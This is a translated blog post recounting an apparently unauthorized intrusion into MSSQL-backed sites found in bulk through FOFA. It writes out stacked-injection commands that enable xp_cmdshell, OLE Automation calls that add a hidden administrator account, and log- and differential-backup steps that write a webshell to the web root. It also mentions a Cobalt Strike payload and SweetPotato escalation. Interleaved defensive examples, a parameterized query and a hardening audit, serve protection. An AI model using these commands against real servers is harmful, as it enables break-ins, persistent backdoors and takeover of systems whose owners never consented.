A newbie's first real engagement ran into MSSQL stacked injection; experts, go easy on me.


Stacked injection

In SQL the semicolon ";" marks the end of a statement. Appending another SQL statement after the semicolon that terminates the statement being executed therefore yields stacked injection.

This resembles a UNION-based query, except that a UNION query is limited to query (SELECT-type) statements, whereas stacked injection can execute any statement.
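To make the mechanism concrete, here is an added T-SQL example (not code from the original post) of a login lookup written two ways: one that splices the input into the batch text, and one that passes it as a typed parameter so a ";" inside the value can never start a second statement. The table, column and parameter names (dbo.Users, Username, PasswordHash, @user, @hash) are assumed.

```sql
-- Added example, not from the original post. dbo.Users and its columns are assumed.

-- Vulnerable: the input is concatenated into the batch text, so a value that closes
-- the quote and adds ';' makes EXEC run a second, caller-chosen statement.
CREATE PROCEDURE dbo.Login_Vulnerable @user nvarchar(128), @hash nvarchar(128)
AS
BEGIN
    DECLARE @sql nvarchar(max) =
        N'SELECT Id FROM dbo.Users WHERE Username = ''' + @user +
        N''' AND PasswordHash = ''' + @hash + N'''';
    EXEC (@sql);   -- @user = N'x''; SELECT @@VERSION --' executes two statements
END;
GO

-- Hardened: the batch text is fixed; the value travels as a typed parameter,
-- so quotes and ';' inside it are only characters in the comparison.
CREATE PROCEDURE dbo.Login_Safe @user nvarchar(128), @hash nvarchar(128)
AS
BEGIN
    EXEC sp_executesql
        N'SELECT Id FROM dbo.Users WHERE Username = @u AND PasswordHash = @h',
        N'@u nvarchar(128), @h nvarchar(128)',
        @u = @user, @h = @hash;
END;
GO
```

The same applies to application code: a parameterized query through the driver behaves like Login_Safe, while string-building the statement behaves like Login_Vulnerable.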

As a newbie I can't audit PHP code, so I won't post the SQL statement source here.

Here is the penetration process. First, FOFA finds targets in bulk.

The front page gets a round of weak-password attempts first.

In fact, a few weak passwords went straight into the admin backend, but the backend had no getShell point.

The only option was to try injection on the backend login window, capturing the request for testing.

Stacked injection works, and the backend database is MSSQL.

Ping a DNSLog domain to see whether commands can be executed.



Another idea: try xp_cmdshell.

Manually enabling xp_cmdshell showed the feature is not disabled and commands execute:

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

Tried injecting a CS PowerShell payload directly through xp_cmdshell:

EXEC master..xp_cmdshell '...'  -- the original only writes the placeholder "AV-evading powershell" here, not a payload

SweetPotato to escalate to SYSTEM.

Since even xp_cmdshell was not disabled, there is presumably no AV on the box.

Took a look at the processes first. Hmm, that many PowerShell processes already... no point playing further.

Could try tracing the other intruders; that's for the next article.

There is no internal network. Calling it a day.

Conclusion

All of this only worked because there is no AV and the commands were not blocked. Here is what to do if xp_cmdshell is disabled.

1. The sp_configure function (OLE Automation Procedures)

Command to enable OLE Automation through sp_configure:

EXEC sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;

Commands run this way return no output.

The following commands add a shadow user and add it to the administrators group (each block is sent as its own batch, since @shell cannot be declared twice in one batch; note that the original uses a different account name in the second statement than it creates in the first):

DECLARE @shell INT;
EXEC sp_oacreate 'wscript.shell', @shell OUTPUT;
EXEC sp_oamethod @shell, 'run', NULL, 'c:\windows\system32\cmd.exe /c net user hack$ 0r@nge /add';

DECLARE @shell INT;
EXEC sp_oacreate 'wscript.shell', @shell OUTPUT;
EXEC sp_oamethod @shell, 'run', NULL, 'c:\windows\system32\cmd.exe /c net localgroup administrators 0r@nge$ /add';

There are other functions too, which I won't list here.

In many cases the two methods above won't execute (AV is present). With an MSSQL database the following two methods can be used instead.

2. Log backup write shell

Prerequisites:

1. The database is injectable

2. The user has read and write permission, or at least DBO permission

3. The absolute path of the website root is known

4. The web server and the database are not separated

Moreover, the webshell file produced by this method is very small, so the backup is very likely to succeed.

Steps:

1. Switch the database to full recovery mode:

;alter database <dbname> set RECOVERY FULL --

2. Create a table with an image column:

; create table orange(a image) --

3. Back up the database (full backup):

; backup database <dbname> to disk = 'c:\www\<backup file>' with init --

4. Write the one-line webshell into the table:

; insert into orange(a) values (0x...) --  -- the value is the hex-encoded file content

5. Use a log backup to write the data out as the web page:

; backup log <dbname> to disk = 'c:\www\<shell file>' with init --

6. Delete the table:

; drop table orange --

3. Differential backup write shell

Concept: a differential backup captures the data that has changed since the last full backup. Only the selected files and folders that carry the mark are backed up, and the mark is not cleared, that is, the backed-up files are not flagged as backed up (the archive attribute stays set).

In plain words: the second backup writes out only what differs from the last full backup, so once a one-line webshell is inserted into the table and a second backup is taken, that one line is written out through the database.

Conditions:

1. The absolute path of the website root is known

2. Write permission (DBO permission or above)

3. The web server and the database are not separated

1. Back up the database (full backup):

; backup database <dbname> to disk = 'c:\www\...' with init --

2. Create a table:

% '; create table orange(a image) --

3. Write the webshell:

% '; insert into orange(a) values (0xxxxx) --

4. Perform the differential backup (a differential is taken with BACKUP DATABASE, not BACKUP LOG, which cannot be differential):

% '; backup database <database name> to disk = 'c:\www\orange.asp' with differential, format; --

5. Delete the table:

; drop table orange --

All of this is theory; in practice the payloads may be filtered and have to be modified to get past the filter.
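The three methods above all depend on a handful of server-side conditions: xp_cmdshell or OLE Automation Procedures enabled, and an application login that holds sysadmin, db_owner or backup rights. As an added defender-side check (not code from the original post), this T-SQL audit lists those conditions for the instance and the current database and then turns the two options back off; it assumes a sysadmin connection, and the login name 'webapp' is a placeholder.

```sql
-- Added example, not from the original post. Run as sysadmin on the MSSQL
-- instance, connected to the application database. 'webapp' is a placeholder.

-- 1) Dangerous server options: enabled = 1 means the feature is on.
SELECT name, CAST(value_in_use AS int) AS enabled
FROM sys.configurations
WHERE name IN (N'xp_cmdshell', N'Ole Automation Procedures');

-- 2) sysadmin members: only sysadmin can run sp_configure / RECONFIGURE,
--    so an application login listed here is the root cause of the post's scenario.
SELECT m.name AS login_name, m.type_desc
FROM sys.server_role_members rm
JOIN sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE r.name = N'sysadmin';

-- 3) In the current database: db_owner / db_backupoperator members can run
--    BACKUP DATABASE and BACKUP LOG to any path the service account can write.
SELECT r.name AS db_role, u.name AS db_user
FROM sys.database_role_members rm
JOIN sys.database_principals r ON r.principal_id = rm.role_principal_id
JOIN sys.database_principals u ON u.principal_id = rm.member_principal_id
WHERE r.name IN (N'db_owner', N'db_backupoperator');

-- 4) Effective rights of the application login (impersonate, check, revert).
EXECUTE AS LOGIN = N'webapp';
SELECT IS_SRVROLEMEMBER(N'sysadmin') AS is_sysadmin,
       HAS_PERMS_BY_NAME(DB_NAME(), N'DATABASE', N'BACKUP DATABASE') AS can_backup_db,
       HAS_PERMS_BY_NAME(DB_NAME(), N'DATABASE', N'BACKUP LOG') AS can_backup_log;
REVERT;

-- 5) Turn the options off ('show advanced options' must be on to change them).
EXEC sp_configure N'show advanced options', 1;     RECONFIGURE;
EXEC sp_configure N'xp_cmdshell', 0;               RECONFIGURE;
EXEC sp_configure N'Ole Automation Procedures', 0; RECONFIGURE;
EXEC sp_configure N'show advanced options', 0;     RECONFIGURE;
```

A web application login that returns 1 in any column of step 4 should be moved to a least-privilege database user, since the log and differential backup methods need nothing beyond BACKUP permission plus a writable web root.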